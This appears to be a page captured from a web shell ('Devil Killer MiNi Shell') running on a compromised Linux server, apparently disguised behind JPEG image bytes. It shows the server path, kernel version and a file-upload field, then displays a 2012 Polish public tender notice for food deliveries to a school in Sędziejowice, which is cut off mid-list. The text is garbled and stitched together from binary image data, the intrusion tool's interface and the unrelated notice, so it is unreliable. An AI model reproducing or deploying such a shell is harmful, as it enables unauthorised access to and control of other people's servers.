JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120824/313424-N-2012.html

<p class="kh_header"><b>Sędziejowice: Zakup wraz z dostawą artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 313424 - 2012; data zamieszczenia: 24.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących Nr 1 im. Powstańców 1863 r. w Sędziejowicach , ul. Powstańców 1863 r. nr 6, 98-160 Sędziejowice, woj. łódzkie, tel. 43 6771027, faks 43 6771027.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sedziejowice.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest zakup wraz z dostawą artykułów spożywczych dla Zespołu Szkół Ogólnokształcących Nr 1 w Sędziejowicach z podziałem na 10 części:
Część I     Zamówienia - dostawa mięsa i wędlin; CPV 15.11.00.00-2
Część II    Zamówienia - dostawa mięsa drobiowego, CPV 15.11.20.00-6
Część III   Zamówienia - dostawa produktów nabiałowych; CPV 15.50.00.00-3
Część IV   Zamówienia - dostawa mrożonek; CPV 15.33.11.70-9
Część V    Zamówienia - dostawa warzyw i owoców; CPV 03.20.00.00-3
Część VI   Zamówienia - dostawa ziemniaków; CPV 03.21.00.00-6
Część VII  Zamówienia  - dostawa jaj; CPV 03.14.25.00-3
Część VIII Zamówienia - dostawa ryb CPV 15.20.00.00-0
Część IX Zamówienia - dostawa pozostałych artykułów spożywczych; CPV 15.80.00.00-6
Część X Zamówienia - dostawa pieczywa i wyrobów cukierniczych. CPV 15.81.00.00-9

2. Poszczególne dostawy będą realizowane sukcesywnie w okresie obowiązywania umowy po zamówieniu złożonym telefonicznie przez  Zamawiającego (intendenta) z wyprzedzeniem na co najmniej jednego dnia roboczego. Dostawa powinna nastąpić w dniu wyznaczonym przez zamawiającego w godzinach 7:00 - 15:00 (stołówka w Zespole szkół Ogólnokształcących) i w godzinach 7:00 - 12:00 (stołówka w Przedszkolu Publicznym) i realizowana będzie środkiem transportu Wykonawcy na jego koszt. Dostarczony towar powinien być w początkowym okresie terminie przydatności do spożycia.

3. Oferowane produkty żywnościowe muszą być wysokiej jakości, spełniać parametry jakościowe określone dla danego asortymentu przez PN, spełniać wymogi sanitarno - epidemiologiczne i zasady systemu HACCP.

4. Dostawy artykułów żywnościowych muszą być realizowane zgodnie z zasadami GHP Dobrej Praktyki Higienicznej) dotyczy głównie:
-świadectwa jakości przy dostawach mięsa, przetworów mięsnych, mleka i przetworów mlecznych i ryb oraz przy dostawie jaj - aktualne zaświadczenie z Powiatowego Inspektoratu Weterynarii o podleganiu kontroli.
- dostarczony asortyment dotyczący mięsa i wyrobów wędliniarskich powinien posiadać handlowy dokument identyfikacyjny.

5.Przedmiot zamówienia musi być dostarczony odpowiednim (dostosowanym do asortymentu) środkiem transportu spełniającym wymagania sanitarne, w opakowaniach gwarantujących bezpieczny transport i magazynowanie.

6. Zamawiający zastrzega sobie że w okresach przerw zimowych i wakacyjnych oraz przerw wynikłych z  kalendarzowych świąt i dni wolnych od zajęć lekcyjnych - zamówienia nie będą zgłaszane.

7. Zamawiający zastrzega sobie możliwość wprowadzania zmian do umowy w zakresie zmniejszania ilości i wartości dostaw w sytuacjach niezależnych do Zamawiającego oraz w przypadku wystąpienia sytuacji, których Zamawiający nie mógł przewidzieć w chwili jej zawarcia (np. zmniejszenie stanów osobowych).

8. Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych zmniejszeniem ilości i wartości dostaw przewidzianych w umowie.

9. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 20% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 7 Ustawy w przypadku: wyczerpania ilości oraz asortymentu uszczegółowionego w formularzu ofertowym zgodnym z zadaniem. 
Wykonawca, któremu zostanie udzielone zamówienie podstawowe zobowiązany będzie do zastosowania w zamówieniach uzupełniających cen nie wyższych niż zastosowanych w zamówieniu podstawowym(załącznik nr 5 do SIWZ - Wzór umowy).

10. Szczegółowy opis przedmiotu zamówienia zawierają formularze asortymentowo - cenowe - załącznik nr 6 do SIWZ.

11. Nazwy własne podane w formularzach asortymentowo - cenowych, które stanowią załącznik nr 6 do SIWZ, należy rozumieć jako preferowanego typu. Wykonawca może zaproponować produkty o innej nazwie, jednak muszą one spełniać wymogi tej samej lub wyższej jakości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 20% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 7 Ustawy w przypadku: wyczerpania ilości oraz asortymentu uszczegółowionego w formularzu ofertowym zgodnym z zadaniem. Wykonawca, któremu zostanie udzielone zamówienie podstawowe zobowiązany będzie do zastosowania w zamówieniach uzupełniających cen nie wyższych niż zastosowanych w zamówieniu podstawowym(załącznik nr 5 do SIWZ).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.20.00-6, 15.50.00.00-3, 15.33.11.70-9, 03.20.00.00-3, 03.21.00.00-6, 03.14.25.00-3, 15.20.00.00-0, 15.80.00.00-6, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.

Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o dokumenty oraz oświadczenia wymagane w rozdziale IV SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o dokumenty oraz oświadczenia wymagane w rozdziale IV SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o dokumenty oraz oświadczenia wymagane w rozdziale IV SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o dokumenty oraz oświadczenia wymagane w rozdziale IV SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o dokumenty oraz oświadczenia wymagane w rozdziale IV SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Formularz oferty według załączonego wzoru - Załącznik nr 1 do SIWZ.
2/ W przypadku, gdy dokumenty przetargowe podpisują inne osoby niż ujawnione w rejestrach, do oferty należy dołączyć pełnomocnictwo udzielone przez osoby upoważnione, z zaznaczeniem zakresu i okresu udzielonego pełnomocnictwa.
3/ Formularz asortymentowo - cenowy dla danej części zamówienia - Załącznik nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Działając zgodnie z Art. 144 ust.1 ustawy Prawo Zamówień Publicznych, Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty w szczególności w przypadkach:
1/ Zmian ogólnych: 
a)zmiany będące skutkiem poprawy oczywistej pomyłki pisarskiej bądź rachunkowej,
b) zmiany stanu prawnego, mające wpływ na realizację przedmiotu zamówienia,

2/ Zmian wpływających na termin wykonania umowy:
a) możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego lub jest efektem działania siły wyższej lub przyczyn obiektywnych niezależnych od Wykonawcy.

3/ Zmian wpływających na wynagrodzenie:
a) możliwa jest zmiana postanowień umowy, w związku ze zmianą stawki podatku od towarów i usług ( VAT )

4/ Innych zmian - z zastrzeżeniem art. 140 ust. 3 ustawy Prawo Zamówień Publicznych.

5/ Zmiany zawartej umowy wymagają pisemnego uzasadnienia, sporządzonego przez komisję powołaną przez Zamawiającego. Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej.

6/Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadkach wskazanych w umowie i ustawie oraz gdy:
a) zostanie ogłoszona likwidacja Wykonawcy,
b) Wykonawca nie rozpoczął realizacji umowy.

7/ Wykonawca dopuścił się rażącego naruszenia innych istotnych postanowień umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sedziejowice.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ogólnokształcących Nr 1, im. Powstańców 1863r. w Sędziejowicach, ul. Powstańców 1863r. nr 6, 98-160 Sędziejowice - sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2012 godzina 10:30, miejsce: Zespół Szkół Ogólnokształcących Nr 1, ul. Powstańców 1863r. nr 6, 98-160  Sędziejowice -  sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MIĘSO WIEPRZOWE, WOŁOWE I PRODUKTY
MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Boczek delikatesowy - 20 kg
2	Kości schabowo - karczkowe - 200 kg
3	Kiełbasa toruńska - 180 kg
4	Kiełbasa zwyczajna - 100 kg
5	Karczek b/k - 108 kg
6	Łopatka - 230 kg
7	Mięso gulaszowe - 180 kg
8	Mięso mielone - 330 kg
9	Smalec - 30 kg
10	Słonina - 50 kg
11	Schab b/k - 160 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z piersi kurczaka - 	180 kg
2	Porcja rosołowa świeża - 220 kg
3	Podudzie kurczaka - 220 kg
4	Udziec z kurczaka - 260 kg
5	Kotlet domowy - 120 kg
6	Wątroba drobiowa - 50 kg
7	Ćwiartka z kurczaka - 90 kg
8	Polędwica z kurczaka (kiełbasa) - 15 kg
9	Parówka drobiowa - 35 kg
10	Kurczak - porcja rosołowa św. - 300 kg
11	Polędwica miodowa drobiowa - 20 kg
12	Pasztet drobiowy w puszcze (150g) - 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRODUKTY NABIAŁOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jogurt naturalny  400 g	- 60 szt.
2	Jogurt owocowy  400 g	- 150 szt.
3	Maślanka 1 l (butelka) - 120 szt.
4	Śmietana 30 %  400 g - 200 szt.
5	Śmietana 18 %  400 g - 60 szt. 
6	Masło roślinne 500 g - 50 szt.
7	Twaróg - 180 kg.
8	Serek (Mój ulubiony) op. 200 g - 35 szt.
9	Jogurt serduszko 150 g - 600 szt.
10	Masło (7+3) 200g - 100 szt.
11	Mleko 2% w woreczku długoterminowe - 1 litr - 250 szt.
12	Śmietana 250 g x 18% - 320 szt.
13	Serek (Danio)  150g - 80 szt.
14	Ser żółty - 20 kg
15	Ser topiony w kostce 100g - 60 szt. 
16	Maślanka - folia op. 1 litr - 60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SOKI, MROŻONE WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Brokuły mrożone 1,5 - 54 kg
2	Fasola szparagowa mrożone 2kg - 80 kg
3	Kalafior mrożony 2 kg - 60 kg
4	Marchew mrożona 2kg - 40 kg
5	Mieszanka warzywna 7 skł. 2 kg - 90 kg
6	Mieszanka warzywna chińska 450 g - 54 kg
7	Wiśnie mrożone - 10 kg
8	Zupa jarzynowa mrożona 0,5 kg - 40 szt.
9	Marchew z groszkiem mrożona 0,5 kg - 40 szt.
10	Frytki op. 1 kg - 140 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> OWOCE, WARZYWA ŚWIEŻE I PRZETWORZONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Burak ćwikłowy - 170 kg
2	Cebula - 90 kg
3	Jabłka - 350 kg
4	Kapusta kiszona 5kg - 260 kg
5	Kapusta biała - 250 kg
6	Kapusta pekińska - 50 kg
7	Marchew - 530 kg
8	Ogórek kiszony  (3 kg) - 18 kg
9	Ogórek zielony - 50 kg
10	Pietruszka - 250 kg
11	Por - 30 kg
12	Pieczarki - 100 kg
13	Papryka czerwona - 30 kg
14	Seler - 150 kg
15	Sałata - 90 szt.
16	Kalafior - 20 szt.
17	Ogórek kiszony 0,5 kg/szt. - 30 kg
18	Cytryna - 20 kg
19	Banan - 80 kg
20	Pomidor - 30 kg
21	Pomarańcze - 60 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZIEMNIAKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ziemniaki jadalne - 6500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	JAJA- kurze klasy A, konsumpcyjne, masa L, jaja duże o wadze jednostkowej od 63g - 73g - 3200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> RYBY MROŻONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z miruny mnożony - 136 kg
2	Paluszki rybne - panierowane z fileta mintaja - 50 kg
3	Śledź w pomidorach - konserwa 1 szt. 0,30 dag - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Barszcz biały (butelka) - 90 szt.
2	Cukier biały - 350 kg
3	Chrzan tarty (słoik 0,29) - 12 szt.
4	Degusta 200 g - 400 szt.
5	Fasola (Jaś) 5 kg - 60 kg
6	Groch łupany 5 kg	 - 40 kg
7	Kasza manna - 20 kg
8	Koper suszony 10 g - 60 szt.
